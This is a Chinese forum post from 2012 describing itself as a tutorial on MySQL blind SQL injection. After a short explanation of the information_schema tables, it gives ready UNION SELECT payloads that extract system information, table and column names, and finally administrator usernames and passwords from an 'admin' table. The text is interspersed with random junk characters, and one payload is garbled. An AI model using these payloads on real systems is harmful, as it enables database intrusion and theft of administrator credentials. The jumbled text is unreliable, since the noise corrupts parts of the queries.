本文介绍MYSQL盲注的一些语句和方法& Q9 A3 k/ }8 s0 V7 J5 N) Q
" L' ]: Y" D `- }学习盲注前先了解下 IFORMATION_SCHEMA 库
6 ~ T. ?' N5 E- d( v
. c6 J# Z1 D7 E6 I/ r7 Z1 Y3 aMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
# q: V. j; l. W* |0 `0 M存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。. J- ^% N3 c5 G' `1 A6 l& j9 e
1.得到所有数据库名:7 z1 p6 ~6 S$ P, L
|SCHEMATA ->存储数据库名的表
. r4 f' Z; b6 U1 W. j6 u' I Z|---字段:SCHEMA_NAME ->数据库名称: W* I7 v0 R M, U( h4 g
2 S5 R) u+ M, a# d
|TABLES ->存储表名- n0 s) P9 R$ z4 ~9 q) j& g2 t
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
5 s. f+ f1 R* B* R; n r|---字段:TABLE_NAME ->存储表的表名) y. j9 ~" k0 ^" j: T+ c
8 |- `9 @% N1 @3 H( b* N
|COLUMNS ->存储的字段名表
: ]* k9 {* p4 S& @|---字段:TABLE_SCHEMA ->该字段所属数据库名: H/ H4 V0 V( | A
|---字段:TABLE_NAME ->存储所属表的名称
3 L9 C, H! b/ k* X4 H2 \3 x9 I5 H. i' \! F
|---字段:COLUMN_NAME ->该字段的名称
) n( A' u$ Y# M. g' D
y( [" e; V, h4 H+ g" w; O
3 v0 l U$ x" L& e" K7 G% h; o$ r& J) T; M* c/ I
###########################################################################
7 X9 J& O& @- g$ e" X# Q4 I3 B$ x& A" b" l$ b) ?
0x001 获取系统信息:8 ^" Y$ A9 Y0 k9 b! u
9 a" z) O1 \, v& nunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
% _0 @4 u7 u4 s& e7 K" k+ V* C4 i) E! e, n* T! O, F
/*! V# ?& [5 `7 o# ]
& w' X7 K( ?' P1 ~@@global.version_compile_os 获取系统版本
* O& ] s# j' ^# g# C# b0 o" K
1 ^$ z; F2 x( {2 U, l@@datadir 数据库路径
) R! f$ }( L7 B( y9 [& X# f+ gdatabase() 当前数据库名称7 r; A9 Q+ L5 ?& v
0x3c62723e 换行HEX值: m9 B; W, g' X. ~( r! Z2 z
: Y7 a4 v. T) ]/ G8 \
*/
8 _5 H7 i7 I" q2 W8 [* u( W( c: T3 @* b8 C; v
+ w9 t$ i+ E+ W. y9 `4 _0 y6 Z
+ {! Y- F* r4 L- j9 g######################################################################
( r4 _; {0 k; C! T$ ?) e0 g# T* y2 ~* Y8 [" G
0x002 获取表名6 `3 ^2 i7 u! U0 r' U
# j* o& j$ S! G
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
0 r! |- K. j& Q. L7 L' g3 F' e* D# t' C; o3 ?5 T! P' b& [
3 H) x# U; g2 m; F- O) o0 T
; R6 p! I. x3 \# R' g
/*0 U$ n5 P+ x, U8 a* T" N
8 q7 R* P/ Y( w* j& |
0x67617264656e 为当前数据库名
- S1 c2 L( G7 ?; ?
; P! d6 w9 p9 s1 U! wgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名3 u: w- Y3 ]6 R' C9 T# t
* N$ Q( J9 d8 M, R; A*/
; z* C, Y* X& A# i8 d* ^/ L. b0 b, n: ^4 U8 i) P4 P
######################################################################7 w. l+ u ^9 W8 t. j
; Y2 T0 M2 {6 _( N+ Z* ~3 m
8 c5 M+ [/ E* M: Y. b: Z$ D! U. ?3 B
0x003 获取字段
2 U2 r$ k: V, k4 X- y, z6 ]# M* i2 e1 u6 P
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
4 H8 `( Y9 ]2 S- |
9 w' `* a1 D( Q8 I$ o/ |3 i/*3 E$ j- y/ |/ u+ i( W. L- E8 A, v' b. S
3 k3 m1 [. k( z) V, qgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
, f& K0 D4 J d4 [+ H6 c& u! L8 T+ Y( @% {( s- ]; n6 g' K/ d% o
0x61646d696e ->选择一个表" v1 X1 [. I, e
- u& I. t: G8 W0x67617264656e ->数据库名
2 }1 I7 `* g7 d( F# Y, F6 }; @) f, M; j) A; H
*/% {5 g5 O' s. t! J: Y I
) T* A, }8 R- a. c3 d% e
#####################################################################
. V2 L" a! K' R) @+ M5 M; i8 ^3 L& q2 K. Y: E
: ?2 W' }0 x8 w# B( G8 j! q: ]
1 [1 u5 L' B- d9 m( z0x004 获取数据
6 o7 Z/ R6 ^3 W
5 d, k5 v( E8 m2 M3 ?: v: Hunion select 1,2,3
8 v5 o' F) Y6 i( I4 g,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin; Y9 O+ }, o. ]5 `
$ Y9 @2 K! g1 t3 U: |* u" [2 Y z
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
0 k* `0 y8 o; Y$ g* p1 a+ L6 }3 [
4 Y0 [# ]& J1 _3 ?6 b7 R
/ n6 V! O4 d" P- [1 K" k% p/*; f J- H! K7 l3 m6 p4 X
9 L) p' K1 S& K: j5 A0x3c62723e 换行符号HEX编码8 h1 a" _- _4 f8 ?; u, n
+ w; b- C8 o2 t8 o( q
group_concat 同时获得该字段所有数据, C0 X" m( }1 f
; S; z5 i# i0 N5 o1 b
*/7 [$ F2 ?! R. v
1 C( { D0 X: @) V q/ A& Z; B+ N4 R
|
发表于 2012-9-13 17:48:44
收藏
支持
反对